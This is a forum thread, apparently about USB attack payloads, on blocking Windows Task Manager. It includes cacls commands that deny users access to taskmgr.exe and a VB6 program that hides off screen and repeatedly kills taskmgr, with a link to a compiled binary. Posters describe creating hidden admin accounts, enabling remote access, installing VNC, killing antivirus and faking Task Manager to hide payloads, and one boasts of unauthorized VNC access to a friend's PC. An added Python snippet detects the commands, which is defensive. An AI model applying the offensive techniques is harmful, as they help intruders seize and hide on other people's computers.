Disabling Ctrl+Alt+Del/Taskmgr


G-Stress

True, but I didn't use the registry. That was the supposedly simplest way of disabling it, but the so-called registry entries weren't even in my registry and I didn't try to create them. I used cacls to disable it for the currently logged-on user. Trying to figure out now how to disable it for only maybe 30 seconds or so.

Link to comment
Share on other sites

rename taskmgr.exe

Like Explorer.exe, it will put a new copy out there (or at least it should) from dll cache files or backups. You have to log on in safe mode, rename the file in dll cache (that it pulls a backup from) and then rename the file. I used this method to update a file so I can make my own themes that wouldn't run under the original uxtheme dll file.

All system files should automatically replace themselves, and if they don't you can use something like system file checker to get it back.

http://en.wikipedia.org/wiki/System_File_Checker

Link to comment
Share on other sites

Yea I've read about renaming and deleting the file and that it will create a backup upon next reboot or so. I'm just disabling it for about 30 seconds or so. I used:

cacls c:\windows\system32\taskmgr.exe /D %COMPUTERNAME%\%USERNAME%

which seems to work just fine for now. I just am trying to figure out how to re-enable it again but after 30 seconds exactly.

cacls c:\windows\system32\taskmgr.exe /g %COMPUTERNAME%\%USERNAME%:r

re-enables it to the current logged on user with read only access which is fine I just want that command to execute exactly 30 seconds after it has been disabled. The only way I can think of is to ping the localhost and try to do it for only 30 seconds somehow.

Link to comment
Share on other sites

also in gpedit.msc

Link to comment
Share on other sites

Depends on the user... I know for one thing my parents would have no idea how to fix it and are too afraid to modify the registry for fear of breaking Windows.

It would be a great little addition you could add for those not-so-experienced Windows users. Renaming the executable would really mess with them too. Can't hurt to add it to the payload, like everything else, you can enable/disable it at your own liking. Personally I think it would be fun. Ya, it's kind of obvious, but that will just make them wonder who/how that got disabled. I love playing pranks with the hacksaw 8-) Friend of mine reinstalled Windows last week because I VNCed into his comp and started messing with him. He freaked. I'm gonna go disable Ctrl-Alt-Delete on him now... he's not techy enough to figure that one out. hehe...

Link to comment
Share on other sites

Better would be a Task Manager clone that hides your programs from showing up in it, or making a registry file that points to your version of a Taskmanager.exe on a thumb drive that hides your programs from being seen and then reverts back at the end of your payload to the original Taskmanager on exit. This way they can still use Task Manager to end certain programs but yours never show up in Taskmanager. If I remember correctly, there are some Taskmanager clones on PSC in VB6, so all you need to do is make the GUI look identical to the system you're on and you're pretty much golden. Make several variants to match the OS, like one for XP, 2000, Server 2003, etc.

They all look similar anyway so some people might not even notice. And since it's not a virus, it shouldn't set off any alerts, although ZoneAlarm seems to ask to allow EVERY program to run if it is set up properly.

It will be defeated if someone checks msinfo32.exe because they can see running tasks in there as well. But then again, you could do the same thing here and make a clone that filters out your running payloads.

Link to comment
Share on other sites

@ remkow,

Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable.

@ digip,

I'm liking that idea a lot :) actually I had something similar in mind that would be a 3 step process.

It would start out maybe just enabling telnet, rdp and creating a hidden admin user.

Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc.

Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that.

Link to comment
Share on other sites

You will have to put hooks in there to check for getting taskmanager from other places too, though. Like right clicking the taskbar or "start/run/taskmgr"

Link to comment
Share on other sites

Here is a little vb6 app that when run, hides it off screen and captures the delete key as well as mouse movements, so if they right click the taskbar to start taskmgr or use start/run or even windowskey+R to load a run box and manually run taskmgr, it kills taskmgr from running. Press F12 and it unloads the program, or add another timer and kill the vb6 program after so many minutes.

'End Taskmgr in Windows XP
'12/31/2007 - DigiP
'
'Following Line allows ShellExecute commands
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

'Mouse Detection Src Code: http://www.daniweb.com/forums/thread101100.html
Private Type POINTAPI
    X As Long
    Y As Long
End Type

Private Declare Function GetCursorPos Lib "User32" (lpPoint As POINTAPI) As Long


Private Sub Form_KeyUp(KeyCode As Integer, Shift As Integer)

On Error GoTo poo
If KeyCode = vbKeyDelete Then 'Because we only want to check if delete is pressed in combo with ctrl+alt+del
MakeNotTopMost (Me.hWnd)
ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
End If

MakeTopMost (Me.hWnd)

'Change this to whatever you want!
If KeyCode = vbKeyF12 Then Unload Me

Exit Sub


poo:
MakeTopMost (Me.hWnd)
Exit Sub

End Sub



Private Sub Timer1_Timer()
Dim Point As POINTAPI
Dim lngReturn As Long
Dim lngScreenX As Long
Dim lngScreenY As Long
lngReturn = GetCursorPos(Point)
lngScreenX = Point.X
lngScreenY = Point.Y
' Enter Code to whatever you want with the results
'
'Debug.Print "X-pos: " & lngScreenX & " , Y-pos: " & lngScreenY

On Error GoTo poo
MakeNotTopMost (Me.hWnd)
ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
MakeTopMost (Me.hWnd)
Exit Sub

poo:
MakeTopMost (Me.hWnd)
Exit Sub

End Sub

Create a form and add timer to it (Set the interval to like 2000 which is 2 seconds or 1000 for 1 second). Then resize the form to like 10x10 pixels and make its start up position off screen. Done.

Full source project download as well as working EXE file: http://www.twistedpairrecords.com/digip/ctrled.rar

And BTW, virus scanners do not detect it since it really isn't malicious code, just built in Windows functions. Will not work on anything older than XP since taskmgr is not a program on 98 or 95 and taskkill is an XP system program.

This can still be detected and defeated by opening cmd.exe and typing in tasklist to see what's running. Then killing it with:

taskkill /F /IM ctrled.exe

I leave it up to you if you also want to kill cmd.exe or command.com, but leave yourself a way to end it safely or it will run forever until you reboot.

Link to comment
Share on other sites
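
Added example (not part of any post in this thread): Python detection logic for the two command lines posted above, the `cacls ... /D` deny entry on taskmgr.exe and `taskkill /F /IM taskmgr.exe`, run over constructed process-creation command lines. The function names, finding labels and the `WORKSTATION\alice` account are assumptions, and the `icacls /deny` form goes beyond what the thread shows.

```python
import re
import shlex

ACL_TOOLS = {"cacls", "cacls.exe", "icacls", "icacls.exe"}
KILL_TOOLS = {"taskkill", "taskkill.exe"}
TARGET = "taskmgr.exe"

def _tokens(cmdline):
    # posix=False keeps backslashes in Windows paths and leaves quotes on tokens.
    try:
        toks = shlex.split(cmdline, posix=False)
    except ValueError:          # unbalanced quote: fall back to whitespace split
        toks = cmdline.split()
    return [t.strip('"') for t in toks]

def _basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def classify(cmdline):
    """Return a finding label (hypothetical names) for one command line, or None."""
    toks = _tokens(cmdline)
    if not toks:
        return None
    image, args = _basename(toks[0]), toks[1:]
    lowered = [a.lower() for a in args]
    if image in ACL_TOOLS:
        hits_target = any(_basename(a) == TARGET for a in args)
        # cacls denies with "/D user"; icacls denies with "/deny user:perm".
        if hits_target and any(a in ("/d", "/deny") for a in lowered):
            return "acl-deny-on-taskmgr"
    if image in KILL_TOOLS:
        # "/IM <image>" may appear anywhere among the flags, in any case.
        for i, a in enumerate(lowered[:-1]):
            if a == "/im" and _basename(args[i + 1]) == TARGET:
                return "taskkill-taskmgr"
    return None

# Constructed sample command lines, not taken from a real host.
SAMPLE = [
    r"cacls c:\windows\system32\taskmgr.exe /D WORKSTATION\alice",
    r"cacls c:\windows\system32\taskmgr.exe /g WORKSTATION\alice:r",
    r'"C:\Windows\System32\taskkill.exe" /F /IM taskmgr.exe',
    r"TASKKILL /im TaskMgr.exe /f",
    r"taskkill /F /IM notepad.exe",
    r'icacls "C:\Windows\System32\Taskmgr.exe" /deny WORKSTATION\alice:(RX)',
]

def scan(lines):
    """Return (command line, finding) pairs for every line that matches a rule."""
    return [(c, f) for c in lines if (f := classify(c))]
```

A repeated `taskkill-taskmgr` finding every second or two from the same parent process matches the timer loop in the VB6 post; the grant line (`/g ...:r`) is deliberately not flagged because it restores access.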

@ digip,

Nice one. I'll have to play around with that. Hmmm... how bout not kill cmd, but really restrict it to limited usage... actually... I wonder if there is an app, cmd-like, that when a user runs cmd or command.com those commands are mapped to a custom "shell", a fake shell, something that would not allow the user to run admin commands, but appear as normal shell... I got quite a few ideas in mind. I would like to create something not so much as to do damage, but to really make a user think.

@ Sc0rpi0,

Yea I plan to use pskill to kill all existing av/spyware processes... or wouldn't it be better if instead of killing the process just stop the service temporarily ;)

Link to comment
Share on other sites
